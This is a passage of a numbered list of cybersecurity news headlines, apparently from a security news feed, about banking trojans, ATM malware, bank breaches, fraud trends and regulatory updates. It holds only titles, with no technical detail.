  5. 5 Ukraine Central Bank Detects Massive Attack Preparation
  6. 6 US Banks Targeted with Trickbot Trojan
  7. 7 One of the Biggest Ethereum and Bitcoin Exchanges Got Hacked
  8. 8 Swiss Users Targeted with Windows, macOS Banking Trojan
  9. 9 Critical Flaw Found in Windows NTLM Security Protocol
  10. 10 Critical RCE Vulnerability Found in Cisco WebEx Extensions, Again
  11. 11 Cyberattack Hits Ukraine Then Spreads Internationally
  12. 12 Kaspersky: Online Banking Hacks Cost Banks Nearly $1.8M Each
  13. 13 Most Organizations Believe Their Mainframe is More Secure Than Other Systems
  14. 14 HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
  15. 15 Poor Endpoint Security Can Cost You Millions in Detection, Response, and Wasted Time
  16. 16 Massive Cyberattack Targeting 99 Countries Causes Sweeping Havoc
  17. 17 Bank Account Hackers Used SS7 to Intercept Security Codes
  18. 18 Google Docs Phishing Attack Abuses Legitimate Third-Party Sharing
  19. 19 FBI: Business- and Email Account Compromise Attack Losses Hit $5 Billion
  20. 20 Blackmoon Banking Trojan Goes Modular
  21. 21 Banks Must Focus More on Cyber-Risk
  22. 22 Cybercriminals Seized Control of Brazilian Bank for 5 Hours
  23. 23 Health Savings Account Fraud: The Rapidly Growing Threat
  24. 24 Mobile Payment Card Cloning: Understanding the Risks
  25. 25 ATMitch: Remote Administration of ATMs
  26. 26 Banking Agencies Issue Joint Report to Congress
  27. 27 NY Breach Report Highlights Third-Party Risk
  28. 28 Over One Million Fraud Attacks on Financial Firms in 2016
  29. 29 Dridex Trojan Gets AtomBombing Update
  30. 30 Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan
  31. 31 Banks Around the World Targeted in Watering Hole Attacks
  32. 32 Fast Food Chain Arby’s Acknowledges Breach
  33. 33 A Rash of Invisible, Fileless Malware is Infecting Banks Around the Globe
  34. 34 Zeus-Derived Flokibot Malware Invades PoS
  35. 35 Infected Weather App's Forecast: Malware
  36. 36 ABA Endorses Anti-Phishing and Brand Protection Solution by Easy Solutions
  37. 37 Stolen Passwords Fuel Cardless ATM Fraud
  38. 38 Carbanak's Back And Using Google Services For Command-and-Control
  39. 39 ATM Malware Retooled to Strike More Machines
  40. 40 Bank Leaks 60,000 Account Details in Three Character Email Slip-up
  41. 41 Source Code for Another Android Banking Malware Leaked
  42. 42 Hacks at Russian Central Bank Have Cost 2 Billion Rubles
  43. 43 Ransomware as a Service Fuels Explosive Growth
  44. 44 InPage Zero Day Used in Attacks Against Banks
  45. 45 'Alice' Malware Loots ATMs
  46. 46 'Frighteningly Easy' Hack Guesses Full Credit Card Details In 6 Seconds
  47. 47 Tesco Bank Hacked
  48. 48 OCC Discloses Data Breach
  49. 49 Fake Executive Social Media Accounts Threaten Enterprises
  50. 50 Android Trojan Targets Customers of 94 Banks in US, Europe
  51. 51 TrickBot Banking Trojan is the Next Big Threat
  52. 52 Hackers Changing Tactics, Techniques, and Procedures
  53. 53 Ransomware Raises The Bar Again
  54. 54 88% of Employees Lack Awareness to Stop Privacy or Security Incidents
  55. 55 Attackers 'Hack' ATM Security with Explosives
  56. 56 Russian Criminals' Bank Attacks Go Global
  57. 57 FFIEC Rewrites the Information Security IT Examination Handbook
  58. 58 FDIC Updates IT Examination Procedures
  59. 59 SWIFT Sees New Hack Attacks Against Banks
  60. 60 Secret Service Warns of ‘Periscope’ Skimmers
  61. 61 Banking Trojan GozNym Botnet Sinkholed After Infecting Over 23,000 Victims in UK, US and Europe